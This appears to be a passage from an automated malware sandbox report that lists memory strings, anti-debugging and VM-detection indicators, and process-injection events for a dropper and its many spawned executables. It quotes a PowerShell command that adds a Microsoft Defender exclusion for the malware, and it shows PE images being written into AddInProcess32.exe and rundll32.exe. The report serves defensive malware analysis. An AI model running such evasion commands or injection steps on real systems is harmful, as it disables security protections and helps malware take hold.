                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                  Source: AddInProcess32.exe, 00000005.00000002.4471946654.0000000001210000.00000004.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3179241086.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3241666787.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: CGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_Q%SystemRoot%\system32\mswsock.dlll
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno 
anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeAPI call chain: ExitProcess graph end nodegraph_12-7506
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeAPI call chain: ExitProcess graph end nodegraph_14-6894
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402E47 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00402E47
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040AF7C LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,12_2_0040AF7C
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00415DC0 mov eax, dword ptr fs:[00000030h]15_2_00415DC0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00906027 mov eax, dword ptr fs:[00000030h]15_2_00906027
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F0D90 mov eax, dword ptr fs:[00000030h]15_2_008F0D90
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F092B mov eax, dword ptr fs:[00000030h]15_2_008F092B
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00942E03 push dword ptr fs:[00000030h]15_2_00942E03
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeCode function: 16_2_012020A3 push dword ptr fs:[00000030h]16_2_012020A3
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeCode function: 17_2_011700A3 push dword ptr fs:[00000030h]17_2_011700A3
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeCode function: 18_2_010220A3 push dword ptr fs:[00000030h]18_2_010220A3
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004031E9 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,12_2_004031E9
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040B9B5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,12_2_0040B9B5
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402E47 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00402E47
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040834B SetUnhandledExceptionFilter,__encode_pointer,12_2_0040834B
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040836D __decode_pointer,SetUnhandledExceptionFilter,12_2_0040836D
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004027AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004027AB
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00419DC7 SetUnhandledExceptionFilter,15_2_00419DC7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00417B4E
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004173DD
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0090A02E SetUnhandledExceptionFilter,15_2_0090A02E
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00907DB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00907DB5
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00907644 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00907644
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection unmapped: unknown base address: 400000
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,15_2_00415D00
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00905F67 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,15_2_00905F67
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: EB6008
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 405000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 406000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2E4D008
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 405000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 406000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 30E5008
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess created: unknown unknown
